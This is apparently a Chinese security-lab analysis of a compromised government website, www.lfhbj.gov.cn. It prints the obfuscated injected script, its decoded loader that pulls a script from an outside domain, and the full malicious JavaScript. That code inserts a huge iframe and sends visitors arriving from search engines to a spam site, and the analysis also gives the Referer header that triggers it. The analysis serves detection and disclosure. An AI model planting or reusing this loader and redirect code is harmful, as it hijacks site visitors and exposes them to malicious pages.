廊坊市环境保护局网站挂马分析

反黑实验室在监测到廊坊市环境保护局网站遭到黑客挂马攻击事件后,实验室反黑自由职业者对该挂马事件进行分析。

廊坊市环境保护局网站挂马分析

网站名称

廊坊市环境保护局网站

网站域名

www.lfhbj.gov.cn

挂马页面

http://www.lfhbj.gov.cn/dA871661/l6nAP.aspx

挂马代码

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('o q=l.n(h,8,k,7,2,6,9,b,8,7,k,i,1,9,9,6,g,d,d,a,a,a,c,8,0,e,e,e,f,c,k,5,4,d,k,k,k,c,3,8,j,h,d,8,k,7,2,6,9,j);m.p(q);',62,27,'102|104|105|106|109|111|112|114|115|116|119|32|46|47|50|51|58|60|61|62|99|String|document|fromCharCode|var|write|xyz'.split('|'),0,{}))</script>

代码解密

<script>
var xyz=String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,115,102,50,50,50,51,46,99,111,109,47,99,99,99,46,106,115,62,60,47,115,99,114,105,112,116,62);document.write(xyz);
</script>

<script src=http://www.sf2223.com/ccc.js></script>

恶意代码

if(typeof(js616_)=='undefined'){
    var js616_ = 'loaded';
    var yesdata = '';
    var js616dm = document.domain.toLowerCase();
    if(js616dm.indexOf('qq.com')!=-1){
        var js616intv = setInterval(function(){if(yesdata!=''){setTimeout("tiaozhuan_616('http://www.ss7272.com','http://www.ss7272.com')",1);}},1);
        document.writeln("<iframe border=0 align=center hspace=0 name=searchbar marginwidth=0 marginheight=0 framespacing=0  frameborder=0 scrolling=no width=100% height=18000 src=\"http://www.ss7272.com\"></iframe>");
        document.write ('<script language="javascript" src="http://count28.51yes.com/click.aspx?id=285659169&logo=1" charset="gb2312"></script>');
    }else{
        var js616intv = setInterval(function(){if(yesdata!=''){setTimeout("tiaozhuan_616('http://www.ss7272.com','http://www.ss7272.com')",1);}},1);
        document.writeln("<iframe border=0 align=center hspace=0 name=searchbar marginwidth=0 marginheight=0 framespacing=0  frameborder=0 scrolling=no width=100% height=18000 src=\"http://www.ss7272.com\"></iframe>");
        document.write ('<script language="javascript" src="http://count28.51yes.com/click.aspx?id=285659169&logo=1" charset="gb2312"></script>');
    }
}
function tiaozhuan_616(js616url,js616so){
    clearInterval(js616intv);
    var js616rfr = document.referrer;

    if(js616rfr.toLowerCase().match('baidu|google|soso|so|sogou|sm|uc|bing|yahoo|youdao|360|haosou')){
        document.writeln("<script language=javascript>window.opener.navigate('"+js616so+"');<\/script>");
        document.writeln("<SCRIPT>if(parent.window.opener) parent.window.opener.location='"+js616so+"'; <\/SCRIPT>");
        document.writeln("<script language=\"javascript\">location.replace('"+js616url+"');<\/script>");
        document.writeln("<body>");
        document.writeln("<script language=\"javascript\">document.location='"+js616url+"';<\/script>");
        document.writeln("<\/body>");
        document.writeln("<meta http-equiv=\"refresh\" content=\"0.1;url=\""+js616url+"\">");
    }
}

代码分析

利用加密混淆过的JavaScript脚本在页面中写入一段用于判断页面请求来源的JavaScript脚本,当请求服务器的域名为“qq.com”时,将页面和原窗口跳转地址设置为“http://www.ss7272.com”,否则将页面和原窗口跳转地址设置为“http://www.ss7272.com”,当请求来源包含“baidu”、“google”、“soso”、“so”、“sogou”、“sm”、“uc”、“bing”、“yahoo”、“youdao”、“360”、“haosou”等关键字时,写入一段JavaScript脚本使页面和原窗口跳转至设置的跳转地址。

触发执行

设置请求头为:Referer:http://www.baidu.com/

取消
Loading...
css.php